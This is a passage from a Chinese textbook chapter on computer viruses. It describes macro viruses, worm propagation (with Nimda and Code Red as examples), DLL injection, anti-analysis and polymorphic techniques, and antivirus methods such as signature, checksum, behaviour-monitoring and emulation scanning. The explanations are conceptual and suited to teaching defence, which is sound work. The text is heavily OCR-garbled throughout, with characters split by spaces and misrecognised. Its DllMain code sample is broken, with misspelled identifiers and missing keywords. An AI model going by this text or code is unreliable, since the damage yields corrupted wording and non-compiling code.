全 性 、 完 整 性 上 的 检测 能 力 又 比较 脆弱 ， 因 此 破坏 系统 的 指令 很 容易 被 病毒 体 执行 。 例 如 
“Nuclear” 宏 病毒 就 是 破坏 操作 系统 的 一 例 典型 病毒 。 

4) ”多 平台 交叉 感染 

宏 病 毒 是 基于 微软 的 Office 平台 进行 病毒 传染 的 ， 因 此 可 以 在 微软 不 同 操作 系统 平台 
上 进行 交叉 感染 。 

5) ”突破 了 病毒 只 感染 程序 文件 的 局 限 

以 往 的 其 他 病毒 被 认为 只 是 感染 程序 文件 ， 而 不 会 感染 数据 文件 。 但 在 宏 病 毒 这 里 是 
个 例外 ， 宏 病毒 专门 感染 数据 文件 ， 彻 底 改 变 了 原来 认为 的 “数据 文件 不 会 传播 病毒 ”的 
错误 认识 。 


8.2.4 ”网 络 蠕虫 病毒 的 技术 特点 


蠕虫 (Worm) 病 毒 是 一 种 通过 网 络 传播 的 恶意 病毒 ， 它 的 出 现 相 对 于 木马 病毒 、 宏 病 
毒 来 说 比较 晚 ， 但 是 蠕虫 病毒 无 论 从 传播 速度 、 传 播 范围 ， 还 是 从 破坏 程度 上 来 讲 ， 都 是 
以 往 的 传统 病毒 所 无 法 比拟 的 。 一 般 的 蠕虫 病毒 由 两 部 分 组 成 ， 一 个 主 程序 和 一 个 引导 程 
序 。 其 中 主 程序 主要 负责 搜索 和 扫描 ， 这 个 程序 通常 能 够 读 取 系统 的 公共 配置 文件 ， 获 得 
与 本 机 联网 的 客户 端 信息 ， 检 测 到 网 络 中 哪些 机 器 没有 被 感染 ， 从 而 通过 系统 漏洞 将 引导 
程序 加 载 到 远程 计算 机 上 。 而 引导 程序 实际 上 是 蠕虫 病毒 主 程序 (或 一 个 程序 段 ) 自 身 的 一 
个 副本 ， 并 且 主 程序 和 引导 程序 都 有 自动 重新 定位 的 能 力 ， 即 这 些 程序 或 程序 段 都 能 够 把 
自身 的 副本 重新 定位 在 另 一 台 计算 机 上 。 因 此 ， 蠕 虫 病毒 在 网 络 环境 下 可 以 以 几何 式 增长 
的 模式 进行 传染 ， 一 旦 病毒 发 作 将 会 给 网 络 的 通信 效率 带 来 严重 威胁 ， 甚 至 在 极 短 时 间 内 
造成 网 络 系统 的 瘫痪 。 
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蠕虫 病毒 的 特点 和 发 展 趋势 主要 体现 在 以 下 几 个 方面 。 

(1) 利用 操作 系统 和 应 用 程序 的 漏洞 主动 进行 攻击 。 

例如 “红色 代码 ”、“ 尼 姆 达 ” 和 “求职 信 ” 等 病毒 都 是 利用 了 操作 系统 和 应 用 程序 
的 漏洞 来 进行 传染 的 。 以 “ 尼 姆 达 ” 病 毒 为 例 ， 该 病毒 利用 了 微软 下 浏览 器 的 一 个 漏 
洞 ， 使 得 感染 了 “ 尼 姆 达 ” 病 毒 的 邮件 在 不 通过 手工 打开 附件 的 情况 下 就 能 激活 病毒 ， 而 
此 前 很 多 防 病毒 专家 还 一 直 认 为 只 要 不 打开 带 有 病毒 的 附件 ， 病 毒 就 不 会 造成 危害 。 类 似 
的 还 有 “红色 代码 ”病毒 则 是 利用 了 微软 IS 服务 器 软件 的 一 个 漏洞 idq.dll 远程 缓存 区 溢 
出 )， 而 “SQL 蠕虫 王 ” 病 毒 则 是 利用 了 微软 数据 库 系 统 的 一 个 漏洞 来 进行 攻击 的 。 

(2) 传播 方式 多 样 化 。 

例如 “ 尼 姆 达 ” 病 毒 和 “求职 信 ” 病 毒 可 利用 的 传播 途径 包括 文件 、 电 子 邮 件 、Web 
服务 器 及 网 络 共享 等 。 

(3) 病毒 制作 技术 与 传统 病毒 不 同 。 

许多 新 病毒 是 利用 当前 最 新 的 编程 语言 与 编程 技术 实现 的 ， 易 于 修改 ， 从 而 可 以 产生 
新 的 变种 ， 也 可 以 逃避 反 病 毒 软件 的 搜索 。 另 外 ， 新 病毒 利用 Java、ActiveX、VBScript 
等 技术 ， 可 以 潜伏 在 HTML 页 面 里 ， 在 用 户 上 网 浏览 时 触发 。 

(4) 与 黑客 技术 相 结合 。 

与 黑客 技术 相 结合 后 潜在 的 威胁 和 损失 更 大 。 例 如 “红色 代码 ”病毒 ， 感 染 后 的 机 器 
会 在 Web 目录 的 \scripts 下 将 生成 一 个 root.exe， 可 以 远程 执行 任何 命令 ， 从 而 使 黑客 能 够 
再 次 进入 。 

一 般 的 蠕虫 病毒 程序 都 至 少 具有 传播 模块 、 隐 藏 模块 和 目的 功能 模块 三 个 部 分 ， 其 中 
传播 模块 负责 蠕虫 的 传播 和 感染 ， 传 播 模 块 又 可 以 分 为 扫描 、 攻 击 和 复制 三 个 基本 模块 ; 
隐藏 模块 负责 病毒 侵入 主机 后 ， 隐 藏 病毒 程序 ， 目 的 功能 模块 则 执行 对 计算 机 的 控制 、 监 
视 或 破坏 等 功能 。 里 虫 病毒 的 一 般 传播 过 程 可 分 为 以 下 3 个 主要 环节 : 

e 扫描: 由 蠕虫 的 扫描 功能 模块 负责 探测 存在 漏洞 的 主机 。 当 程序 向 某 个 主机 发 送 

探测 漏洞 的 信息 并 收 到 成 功 的 反馈 信息 后 ， 就 得 到 一 个 可 传播 的 对 象 。 

@ ”攻击 : 攻击 模块 按 漏洞 攻击 步骤 自动 攻击 扫描 中 找到 的 对 象 ， 取 得 该 主机 的 权限 

(一 般 为 管理 员 权限 )， 获 得 一 个 shell。 

e@ 复制: 复制 模块 通过 原 主机 和 新 主机 的 交互 将 蠕虫 程序 复制 到 新 主机 并 启动 。 

因此 ， 传 播 模块 实际 上 执行 了 一 种 自动 入 侵 的 功能 。 所 以 蠕虫 的 传播 技术 是 蠕虫 技术 
的 核心 ， 没 有 蠕虫 的 传播 技术 ， 也 就 谈 不 上 什么 里 虫 技术 了 。 

我 们 以 前 经 常 从 新 闻 中 看 到 关于 蠕虫 的 报道 ， 报 道中 总 是 强调 蠕虫 如 何 发 送 大 量 的 数 
据 包 ， 造 成 网 络 拥塞 ， 影 响 网 络 通信 速度 。 实 际 上 这 并 不 是 蠕虫 程序 的 本 意 ， 因 为 造成 网 
络 拥塞 对 蠕虫 程 序 的 发 布 者 没有 什么 好 处 。 如 果 可 能 的 话 ， 蠕 虫 程序 的 发 布 者 更 希望 蠕虫 
隐蔽 地 传播 出 去 ， 因 为 蠕虫 传播 出 去 后 ， 蠕 虫 的 发 布 者 就 可 以 获得 大 量 的 可 以 利用 的 计算 
资源 ， 这 样 他 获得 的 利益 比 起 造成 网 络 拥塞 的 后 果 来 说 显然 强 上 万 倍 。 但 是 ， 现 有 的 蠕虫 
采用 的 扫描 方法 不 可 避免 地 会 引起 大 量 的 网 络 拥塞 ， 这 是 蠕虫 技术 发 展 的 一 个 瓶颈 ， 如 果 
能 突破 这 个 难关 ， 蠕 虫 技术 的 发 展 就 会 进入 一 个 新 的 阶段 。 

扫描 发 送 的 探测 包 是 根据 不 同 的 漏洞 进行 设计 的 。 比 如 ， 针 对 远程 缓冲 区 溢出 漏洞 可 
以 发 送 溢出 代码 来 探测 ， 针 对 Web 的 cgi 漏洞 就 需要 发 送 一 个 特殊 的 http 请 求 来 探测 。 
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当然 发 送 探测 代码 之 前 首先 要 确定 相应 端口 是 否 开放 ， 这 样 可 以 提高 扫描 效率 。 一 旦 确认 
漏洞 存在 后 就 可 以 进行 相应 的 攻击 步 又， 不同 的 漏洞 有 不 同 的 攻击 手法 ， 只 要 明白 了 漏洞 
的 利用 方法 ， 在 程序 中 实现 这 一 过 程 就 可 以 了 。 

以 “ 尼 姆 达 ”(Worms .Nimda) 病 毒 为 例 ， 该 种 蠕虫 病毒 在 运行 时 会 采取 几 种 方式 来 选 
择 攻 击 目标 ， 第 一 种 方式 是 搜索 本 地 硬盘 中 的 HTM、HTML 文件 和 Exchange 邮箱 ， 从 中 
找到 E-mail 地 址 ， 并 向 这 些 地 址 发 送 邮件 ， 第 二 种 方式 是 搜索 网 络 共享 资源 ， 并 试图 将 
带 毒 邮件 放 入 别人 的 共享 目录 ; 第 三 种 方式 是 利用 CodeBlue 病毒 的 方法 攻击 随机 卫 地 
址 ， 如 果 是 未 安装 补丁 的 IIS 服务 器 就 会 中 毒 。 同 时 ， 该 蠕虫 会 用 它 自己 搭建 的 SMTP 服 
务 器 向 这 些 目 标 机 器 发 送 电 子 邮 件 。 

如 果 用 户 浏 览 一 个 已 经 被 感染 的 Web 页 时 ， 会 被 提示 下 载 一 个 .eml(Outlook Express) 
的 电子 邮件 文件 。 尼 姆 达 病 毒 在 运行 时 会 查找 本 地 的 HTM/ASP 文件 ， 然 后 将 生成 的 带 毒 
邮件 放 入 这 些 文件 中 ， 并 加 入 JavaScript 脚本。 这 样 ， 每 当 该 网 页 被 打开 时 ， 就 会 自动 打 
开 该 染 毒 的 readme.eml。 对 于 Windows 应 用 程序 ， 尼 姆 达 病毒 可 采用 两 种 方法 来 感染 本 
地 的 PE 文件 ， 一 种 是 通过 注册 表 查 找 所 有 的 Windows 应 用 程序 (除了 Winzip32.exe 程 
序 )， 并 试图 感染 ， 另 一 种 方法 是 搜索 所 有 文件 ， 并 试图 感染 。 


8.2.5 计算 机 病毒 的 其 他 关键 技术 


在 计算 机 病毒 与 反 病毒 技术 的 激烈 对 抗 中 ， 病 毒 与 反 病 毒 技 术 都 得 到 了 快速 的 更 新 和 
发 展 ， 在 这 个 过 程 中 不 断 涌现 出 许多 计算 机 病毒 的 新 技术 。 


1. DLL 远程 注入 技术 


DLL 为 程序 开发 提供 了 一 种 共性 代码 的 复 用 功能 。DLL 是 Dynamic Link Library 的 缩 
写 形式 ， 中 文 译 为 “动态 链接 库 ”。DLL 包含 了 可 由 多 个 程序 共享 使 用 的 代码 和 数据 ， 
是 一 种 不 可 执行 的 二 进 制程 序 文件 ， 它 允许 程序 共享 执行 特殊 任务 所 必需 的 代码 和 其 他 资 
源 。Windows 提供 的 DLL 文件 中 包含 了 允许 基于 Windows 的 程序 在 Windows 环境 下 操 
作 的 许多 函数 和 资源 。 通 过 使 用 DLL， 程 序 可 以 实现 模块 化 ， 由 相对 独立 的 组 件 组 成 。 
例如 ， 一 个 记 账 程序 可 以 按 模块 来 销售 。 可 以 在 运行 时 将 各 个 模块 加 载 到 主 程序 中 (如 果 
安装 了 相应 模块 )。 因 为 模块 是 彼此 独立 的 ， 所 以 程序 的 加 载 速度 更 快 ， 而 且 模块 只 在 相 
应 的 功能 被 请 求 时 才 加 载 。 例 如 在 Windows 操作 系统 中 ，Comdlg32 DLL 执行 与 对 话 框 
有 关 的 常见 函数 。 因 此 ， 每 个 程序 都 可 以 使 用 该 DLL 中 包含 的 功能 来 实现 “打开 ”对 话 
框 。 这 有 助 于 促进 代码 重用 和 内 存 的 有 效 使 用 。 

在 创建 DLL 时 ， 可 以 有 选择 地 指定 入 口 点 函数 。 当 进程 或 线程 将 它们 自身 附加 到 
DLL 或 者 将 它们 自身 从 DLL 分 离 时 ， 将 调用 入 口 点 函数 。 您 可 以 使 用 入 口 点 函数 根据 
DLL 的 需要 来 初始 化 数据 结构 或 者 销毁 数据 结构 。 此 外 ， 如 果 应 用 程序 是 多 线程 的 ， 则 
可 以 在 入 口 点 函数 中 使 用 线程 本 地 存储 (TLS) 来 分 配 各 个 线程 专用 的 内 存 。 下 面 的 代码 
是 一 个 DLL 入 口 点 函数 的 示例 : 


BOOL APIENTRY D11Main( 

HANDLE hModule, // Handle to DLL module 

DWORD ul reason for call, // Reason for calling function 
LPVOID lpReserved ) // Reserved 
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a ( ul reason for call ) 

有 DLL PROCESS ATTRACH: 

// A process is loading the DLL. 

break; 

case DLL THREAD ATTACH: 

/I/aA process is creating a new thread. 

break; 

case DLL THREAD DETACH: 

// A thread exits normally. 

break; 

case DLL PROCESS DETACH: 

/I/aA process unloads the DLL. 

break; 

a TRUE; 

} 

当 入 口 点 函数 返回 FALSE 值 时 ， 如 果 您 使 用 的 是 加 载 时 动态 链接 ， 则 应 用 程序 不 启 
动 。 如 果 您 使 用 的 是 运行 时 动态 链接 ， 则 只 有 个 别 DLL 不 会 加 载 。 入 口 点 函数 只 应 执行 
简单 的 初始 化 任务 ， 不 应 调用 任何 其 他 DLL 加 载 函数 或 终止 函数 。 例 如 ， 在 入 口 点 函数 
中 ， 不 应 直接 或 间接 调用 LoadLibrary 函数 或 LoadLibraryEx 函数 。 此 外 ， 不 应 在 进程 
终止 时 调用 FreeLibrary 函数 。 

正 是 DLL 程序 自身 的 各 种 特点 决定 了 利用 DLL 的 注入 技术 是 当前 计算 机 病毒 广泛 使 
用 的 一 种 方法 。 使 用 这 种 技术 的 病毒 体 通常 位 于 一 个 DLL 中 ， 在 系统 启动 的 时 候 ， 一 个 
EXE 程序 会 将 这 个 DLL 加 载 至 某 些 系统 进程 (如 Explorer.exe) 中 运行 。 这 样 一 来 ， 普 通 的 
进程 管理 器 就 很 难 发 现 这 种 病毒 了 ， 而 且 即 使 发 现 了 也 很 难 清除 ， 因 为 只 要 病毒 寄生 的 进 
程 不 终止 运行 ， 那 么 这 个 DLL 就 不 会 在 内 存 中 印 载 ， 用 户 也 就 无 法 在 资源 管理 器 中 删除 
这 个 DLL 文件 了 。 由 于 带 毒 的 DLL 程序 被 映射 到 宿主 进程 的 地 址 空间 中 ， 它 不 仅 能 够 共 
享 宿主 进程 的 资源 ， 还 可 以 根据 宿主 进程 在 目标 主机 的 级 别 非法 访问 相应 的 系统 资源 ， 另 
外 ， 由 于 DLL 程序 本 身 没有 独立 的 进程 地 址 空间 ， 从 而 可 以 避免 在 目标 主机 中 留 下 “ 蛛 
丝 马 迹 ”， 达 到 病毒 隐蔽 自身 的 目的 。 


2. 抗 分 析 病 毒 技 术 


抗 分 析 病毒 技术 主要 是 为 了 应 对 反 病 毒 分 析 技术 的 ， 为 了 使 病毒 的 原理 和 结构 不 易 被 
破解 和 分 析 ， 这 种 病毒 技术 综合 采用 了 以 下 两 种 技术 : 

@ ”加 密 技术 ， 这 是 一 种 防止 静态 分 析 的 技术 ， 使 得 分 析 者 无 法 在 不 执行 病毒 的 情况 

下 ， 阅 读 加 密 过 的 病毒 程序 。 

e@ 。 反 跟 踪 技术 ， 使 得 分 析 者 无 法 动态 跟踪 病毒 程序 的 运行 。 

以 2002 年 左右 出 现 的 “Win32.Hezhi” 病 毒 为 例 ， 该 病毒 与 以 往 病 毒 最 大 的 不 同 之 处 
在 于 ， 该 病毒 采用 了 很 高 的 加 密 和 反 跟 踪 技术 ， 因 而 不 但 具有 很 强 的 隐蔽 8 性， 且 不 易 为 一 
般 防 病毒 软件 所 查 杀 。 该 病毒 是 一 个 驻 留 内 存 的 多 变型 病毒 ， 可 感染 Windows 95/98、 
Windows NT/2000 系统 的 PE 可 执行 文件 。 
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3. 多 态 型 病毒 技术 


多 态 型 病毒 是 指 采 用 特殊 加 密 技术 开发 的 病毒 ， 这 种 病毒 在 每 感染 一 个 对 象 时 ， 都 可 
以 采用 随机 方法 对 病毒 主体 进行 加 密 。 多 态 型 病毒 主要 是 针对 杀毒 软件 而 设计 的 ， 所 以 随 
着 这 类 病毒 的 增多 ， 使 得 反 病 毒 工作 更 加 困难 。 在 国际 上 ， 造 成 全 球 范围 传播 和 破坏 的 第 
一 例 多 态 型 病毒 是 “TEQUTLA” 病 毒 ， 研 究 人 员 花 费 了 9 个 月 的 时 间 ， 才 编制 出 能 够 完 
全 查 杀 该 病毒 的 软件 。 


4. 病毒 自动 生成 技术 


病毒 自动 生成 技术 是 针对 病毒 的 人 工分 析 技 术 提 出 的 一 种 病毒 自我 保护 技术 ， 以 
“Mutation Engine ”程序 变形 器 为 例 ， 它 可 以 使 程序 代码 本 身 发 生变 化 ， 而 保持 原 有 功 
能 。 利 用 计算 得 到 的 密 钥 ， 变 形 机 产生 的 程序 代码 可 以 有 很 多 种 变化 。 当 计算 机 病毒 采用 
了 这 种 技术 时 ， 就 像 生物 病毒 会 产生 自我 变异 一 样 ， 也 会 变 成 一 种 具有 自我 变异 功能 的 计 
算 机 病毒 。 这 种 病毒 程序 可 以 衍 变 出 各 种 变种 的 计算 机 病毒 ， 且 这 种 变化 不 是 由 人 工 干 预 
生成 的 ， 而 是 由 于 程序 自身 的 机 制 。 单 从 程序 设计 的 角度 讲 ， 这 是 一 项 很 有 意义 的 新 技 
术 ， 使 计算 机 软件 这 一 人 类 思想 的 凝聚 产物 变 成 了 一 种 具有 某 种 “生命 ”形式 的 “ 活 ” 的 
东西 。 但 从 反 病 毒 和 信息 安全 角度 ， 这 种 变形 病毒 给 反 病毒 工作 带 来 了 很 大 的 困难 。 在 众 
多 的 变形 机 中 ， 保 加 利 亚 的 Dark Avenger 变形 机 是 比较 著名 的 。 这 类 变形 病毒 每 感染 出 
下 一 代 病 毒 ， 其 程序 代码 就 全 部 发 生 了 变化 ， 因 此 从 某 种 意义 上 说 ， 病 毒 自动 生成 技术 不 
是 从 “ 质 ” 上 ， 而 是 从 “ 量 ” 上 来 压 垮 病毒 分 析 者 的 。 


8.3 ”病毒 的 检测 和 查 杀 


中 国 计 算 机 反 病 毒 发 展 史 一 般 以 1998 年 为 界 划分 为 两 个 重要 阶段 ， 前 一 个 阶段 主要 
是 查 杀 感 染 文件 型 和 引导 区 病毒 ， 后 一 个 阶段 主要 是 针对 蠕虫 和 木马 的 查 杀 。 发 展 到 今 
天 ， 计 算 机 病毒 更 加 复杂 ， 多 数 新 病毒 是 集 后 门 、 木 马 、 蠕 虫 等 特征 于 一 体 的 混合 型 病 
毒 。 特 别 是 近年 来 ， 病 毒 逃 避 杀 毒 软件 追 杀 的 能 力 在 不 断 提升 ， 病 毒 采用 了 内 核 级 驱动 、 
映像 劫持 、ROOTKIT、 注 册 表 关联 、 插 入 进程 /线程 、 加 壳 加 密 等 多 种 技术 来 对 抗 反 病毒 
技术 ， 病 毒 从 来 没有 像 今天 这 样 ， 将 新 技术 应 用 得 如 此 全 面 、 如 此 完善 。 同 时 计算 机 反 病 
毒 技 术 在 与 计算 机 病毒 的 较量 中 也 得 到 了 升华 ， 得 到 了 质 的 飞跃 。 


8.3.1 计算 机 反 病 毒 技术 的 4 个 发 展 阶段 


计算 机 反 病 毒 技 术 在 与 计算 机 病毒 的 对 抗 中 ， 逐 步 经 历 了 4 个 重要 的 技术 发 展 阶段 。 

第 一 个 阶段 的 反 病毒 技术 一 般 都 是 采取 单纯 的 病毒 特征 代码 分 析 ， 将 病毒 从 带 毒 文 件 
中 清除 掉 。 这 种 方式 可 以 准确 地 清除 病毒 ， 可 靠 性 很 高 。 后 来 病毒 技术 发 展 了 ， 特 别 是 加 
密 和 变形 技术 的 运用 ， 使 得 这 种 简单 的 静态 扫描 方式 失去 了 作用 。 

第 二 个 阶段 的 反 病毒 技术 采用 了 静态 广 谱 特 征 扫描 方法 来 检测 病毒 ， 这 种 方式 可 以 更 
多 地 检测 出 变形 病毒 ， 但 另 一 方面 误 报 率 也 很 高 ， 尤 其 是 用 这 种 不 严格 的 特征 判定 方式 去 
清除 病毒 带 来 的 风险 性 很 大 ， 容 易 造 成 文件 和 数据 的 破坏 。 所 以 说 静态 防 病毒 技术 也 有 难 
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以 克服 的 缺陷 。 

第 三 个 阶段 的 反 病毒 技术 将 静态 扫描 技术 和 动态 仿真 跟踪 技术 结合 起 来 ， 将 查找 病毒 
和 清除 病毒 合 二 为 一 ， 形 成 一 个 整体 解决 方案 ， 能 够 全 面 实现 防 、 查 、 杀 等 反 病毒 所 必 备 
的 各 种 手段 ， 以 驻 留 内 存 方式 防止 病毒 的 入 侵 ， 凡 是 检测 到 的 病毒 都 能 清除 ， 不 会 破坏 文 
件 和 数据 。 随 着 病毒 数量 的 增加 和 新 型 病毒 技术 的 发 展 ， 静 态 扫描 技术 将 会 使 反 毒 软件 速 
度 降低 ， 驻 留 内 存 的 防毒 模块 也 容易 产生 误 报 。 

第 四 个 阶段 的 反 病毒 技术 第 四 代 反 病毒 技术 则 是 针对 计算 机 病毒 的 发 展 ， 基 于 病毒 家 
族 体 系 的 命名 规则 、 多 位 CRC 校 验 和 扫描 机 理 ， 采 用 了 启发 式 智能 代码 分 析 模 块 、 动 态 
数据 还 原 模块 (能 查 出 隐蔽 性 极 强 的 压缩 加 密 文件 中 的 病毒 )、 内 存 解 毒 模 块 、 自 身 免疫 模 
块 等 先进 的 解毒 技术 ， 较 好 地 解决 了 以 前 防毒 技术 顾此失彼 、 此 消 彼 长 的 状态 。 


8.3.2 ”常见 的 病毒 检测 和 查 杀 方法 
1. 特征 代码 法 


特征 代码 法 被 早期 应 用 在 SCAN、CPAYV 等 著名 病毒 检测 工具 中 ， 目 前 被 认为 是 用 来 
检测 已 知 病毒 的 最 简单 、 开 销 最 小 的 方法 。 杀 毒 软 件 最 初 的 查 毒 方式 是 将 所 有 病毒 的 病毒 
码 加 以 剖析 ， 并 且 将 这 些 病毒 独 有 的 特征 搜集 在 一 个 病毒 码 资料 库 中 ， 每 当 需 要 扫描 该 程 
序 是 否 有 毒 的 时 候 ， 就 启动 杀毒 软件 程序 ， 以 扫描 的 方式 与 该 病毒 码 资料 库 内 的 现 有 资料 
一 一 比 对 ， 如 果 双 方 资料 匹配 的 话 ， 即 判定 该 程序 已 遭 病 毒 感染 。 实 现 特征 代码 法 的 一 般 
步骤 如 下 所 示 : 

第 一 步 ， 采 集 已 知 病毒 样本 ， 如 果 病 毒 既 感染 COM 文件 ， 又 感染 EXE 文件 ， 那 么 
就 要 同时 采集 COM 型 病毒 样本 和 EXE 型 病毒 样本 。 

第 二 步 ， 在 病毒 样本 中 ， 抽 取 病 毒 特征 代码 。 在 既 感染 COM 文件 又 感染 EXE 文件 
的 病毒 样本 中 ， 要 抽取 两 种 样本 共有 的 代码 。 

第 三 步 ， 将 特征 代码 纳入 病毒 数据 库 中 。 

第 四 步 ， 打 开 被 检测 文件 ， 在 文件 中 搜索 ， 检 查 文件 中 是 否 含有 病毒 数据 库 中 的 病毒 
特征 代码 。 如 果 发 现 病毒 特征 代码 ， 由 特征 代码 与 病毒 一 一 对 应 ， 便 可 以 断定 ， 被 查 文件 
所 感染 的 是 何 种 病毒 。 

采用 病毒 特征 代码 法 的 检测 工具 ， 其 检测 准确 ， 可 识别 出 病毒 的 名 称 、 误 报警 率 低 、 
依据 检测 结果 ， 可 做 相应 的 解毒 处 理 。 但 是 ， 面 对 不 断 出 现 的 新 病毒 ， 该 种 方法 必须 不 断 
更 新 版 本 ， 否 则 便 不 能 检测 新 出 现 的 各 种 病毒 。 随 着 病毒 种 类 的 增多 ， 新 版 本 的 病毒 数据 
库 会 越 来 越 大 ， 检 索 时 间 也 会 越 来 越 长 ， 这 大 大 降低 了 杀毒 软件 的 使 用 效率 。 并 且 此 类 扫 
毒 方法 不 能 检测 出 隐蔽 性 病毒 ， 因 为 隐蔽 性 病毒 进驻 内 存 后 能 够 将 感染 文件 中 的 病毒 代码 
剥离 出 来 。 


2. 校 验 和 法 


我 们 知道 ， 大 多 数 的 病毒 都 不 是 单独 存在 的 ， 它 们 大 都 依附 或 寄生 在 其 他 的 程序 文件 
中 ， 所 以 被 感染 的 程序 会 有 文件 大 小 增加 的 情况 或 者 是 日 期 被 修改 的 情况 出 现 。 这 样 防 毒 
软件 在 安装 的 时 候 会 自动 将 硬盘 中 的 所 有 文件 做 一 次 汇总 检查 并 加 以 记录 ， 将 正常 文件 的 
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内 容 ， 计 算 其 校 验 和 ， 将 该 校 验 和 写 入 文件 中 或 写 入 别 的 文件 中 保存 。 在 文件 使 用 过 程 
中 ， 定 期 地 或 每 次 使 用 文件 前 检查 文件 现在 内 容 算出 的 校 验 和 与 原来 保存 的 校 验 和 是 否 一 
致 ， 因 而 可 以 发 现 文件 是 否 感染 ， 这 种 方法 叫 校 验 和 法 ， 它 既 可 发 现 已 知 病毒 又 可 发 现 未 
知 病毒 。 
运用 校 验 和 法 检测 病毒 通常 有 三 种 方式 : 
e@ ”在 检测 病毒 工具 中 纳入 校 验 和 法 ， 对 被 查 的 对 象 文件 计算 其 正常 状态 的 校 验 和 ， 
将 校 验 和 值 写 入 被 查 文件 中 或 检测 工具 中 ， 而 后 进行 比较 。 
e ”在 应 用 程序 中 ， 放 入 校 验 和 法 自我 检查 功能 ， 将 文件 正常 状态 的 校 验 和 写 入 文件 
本 身 中 ， 每 当 应 用 程序 启动 时 ， 比 较 现行 校 验 和 与 原 校 验 和 的 值 ， 从 而 实现 应 用 
程序 的 自 检测 。 
® ”将 校 验 和 检查 程序 常 驻 内 存 ， 每 当 应 用 程序 开始 运行 时 ， 自 动 比 较 检 查 应 用 程序 
内 部 或 别 的 文件 中 预先 保存 的 校 验 和 。 
这 种 方法 既 能 发 现 已 知 病毒 ， 也 能 发 现 未 知 病毒 ， 但 是 ， 它 不 能 识别 病毒 类 ， 不 能 报 
出 病毒 名 称 。 由 于 病毒 感染 并 非 文件 内 容 改变 的 唯一 原因 ， 文 件 内 容 的 改变 有 可 能 是 正常 
程序 引起 的 ， 所 以 校 验 和 法 常常 会 导致 误 报警 。 特 别 是 遇 到 软件 版 本 更 新 、 变 更 口令 、 修 
改 运行 参数 等 ， 校 验 和 法 都 会 误 报 。 同 样 ， 校 验 和 法 对 检测 隐蔽 性 病毒 也 是 无 效 的， 因为 
隐蔽 性 病毒 进驻 内 存 后 ， 会 自动 剥 去 染 毒 程序 中 的 病毒 代码 ， 使 校 验 和 法 失效 。 


3. 行为 监测 法 


这 种 方法 利用 病毒 的 特有 行为 特征 来 检测 病毒 ， 由 于 通过 对 计算 机 病毒 的 观察 和 研究 
发 现 ， 有 一 些 行为 是 病毒 的 共同 行为 ， 而 且 比 较 特殊 。 而 在 正常 程序 中 ， 这 些 行为 是 比较 
罕见 的 。 因 此 当 程 序 运行 时 ， 杀 毒 软件 可 以 通过 监视 其 行为 来 发 现 病毒 。 

一 般 病毒 具有 的 行为 特征 可 能 有 如 下 几 种 类 型 。 

1) 抢占 INT 13H 号 中 断 

几乎 所 有 的 引导 型 病毒 ， 都 会 攻击 Boot 扇 区 或 主 引导 扇 区 。 当 系统 启动 时 ，Boot 遍 
区 或 主 引 导 扇 区 获得 执行 权 ， 系 统 会 执行 INT 13H 功能 来 完成 各 种 初始 化 设置 和 引导 系 
统 。 这 时 作为 引导 型 病毒 ， 它 会 占据 INT 13H 功能 ， 并 在 其 中 放置 病毒 所 需 的 代码 ， 此 时 
系统 引导 会 首先 加 载 病毒 代码 ， 完 成 驻 留 后 ， 会 将 自身 代码 隐藏 起 来 ， 继 续 执行 系统 的 正 
常 功 能 。 

2) ”修改 DOS 系统 内 存 总 量 

病毒 为 了 完成 其 特定 的 任务 ， 比 如 传染 、 破 坏 ， 会 常 驻 在 内 存 中 ， 但 是 DOS 操作 系 
统 对 内 存 的 管理 机 制 是 共享 式 ， 所 有 的 程序 全 部 在 同一 内 存 空 间 执行 ， 并 完成 页 面 交换 。 
为 了 防止 DOS 系统 及 其 他 应 用 程序 将 其 覆盖 ， 病 毒 程序 会 将 DOS 系统 内 存 总 量 适当 减 
少 ， 使 DOS 系统 及 其 他 应 用 程序 不 会 占用 其 病毒 代码 驻 留 的 空间 。 

3) “更 改 COM、EXE 文件 内 容 

常见 的 病毒 需要 依附 于 其 他 计算 机 程序 及 文档 。 当 病毒 执行 时 ， 就 必须 将 自身 的 代码 
附加 在 被 感染 的 文件 之 中 ， 常 见 的 可 执行 文件 以 COM、EXE 文件 为 主 。 所 以 病毒 为 了 感 
染 ， 一 般 会 对 COM、EXE 文件 执行 写 入 的 动作 。 

行为 监测 法 可 发 现 未 知 病毒 、 可 相当 准确 地 预报 未 知 的 多 数 病毒 。 但 它 不 能 识别 病毒 
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名 称 ， 而 且 在 软件 实现 上 和 用 户 友好 性 上 存在 一 定 的 难度 。 

4) ”软件 模拟 法 

多 态 性 病毒 每 次 感染 都 会 改变 其 病毒 代码 ， 对 付 这 种 病毒 特征 代码 法 就 显得 力不从心 
了 。 因 为 多 态 性 病毒 代码 往往 都 实现 了 密码 化 ， 而 且 每 次 所 用 密 钥 不 同 ， 把 染 毒 的 病毒 代 
码 相 互 比较 ， 也 各 不 相同 ， 因 此 无 法 找 出 可 能 的 作为 特征 的 稳定 代码 。 虽 然 行为 检测 法 可 
以 检测 多 态 性 病毒 ， 但 是 在 检测 出 病毒 后 ， 因 为 不 知 病毒 的 种 类 ， 难 以 做 杀毒 处 理 。 因 此 
出 现 了 一 种 新 的 病毒 监测 方法 ， 即 软件 模拟 法 。 使 用 该 技术 的 杀毒 软件 在 开始 运行 时 ， 首 
先 使 用 特征 代码 法 监测 病毒 ， 如 果 发 现 隐 蔽 病毒 或 多 态 性 病毒 嫌疑 时 ， 就 启动 软件 模拟 模 
块 来 监测 病毒 的 运行 ， 待 病毒 自身 的 密码 译 码 后 ， 再 运用 特征 代码 法 来 识别 病毒 的 种 类 。 

5) ”VICE 先知 扫描 法 

该 技术 主要 针对 那些 未 知 的 计算 机 病毒 设计 的 ， 利 用 这 种 技术 可 以 直接 模拟 CPU 的 
动作 来 检测 某 些 变种 病毒 的 活动 情况 ， 并 且 分 析出 该 病毒 的 病毒 码 。 由 于 这 种 技术 较 其 他 
解毒 技术 严谨 ， 对 于 比较 复杂 的 程序 在 检测 配对 上 会 耗费 较 多 的 时 间 ， 影 响 用 户 的 计算 机 
速度 ， 所 以 该 技术 的 应 用 并 不 是 那么 广泛 。 


8.3.3 ”杀毒 软件 的 基本 工作 原理 


杀毒 软件 ， 也 称 反 病毒 软件 或 防毒 软件 ， 是 用 于 消除 计算 机 病毒 、 特 洛 伊 木马 和 恶意 
软件 的 一 类 专业 软件 。 杀 毒 软件 通常 集成 监控 识别 、 病 毒 扫描 和 清除 和 自动 升级 等 功能 ， 
有 的 杀毒 软件 还 带 有 数据 恢复 等 功能 ， 是 计算 机 防御 系统 (包含 杀毒 软件 ， 防 火 墙 ， 特 洛 
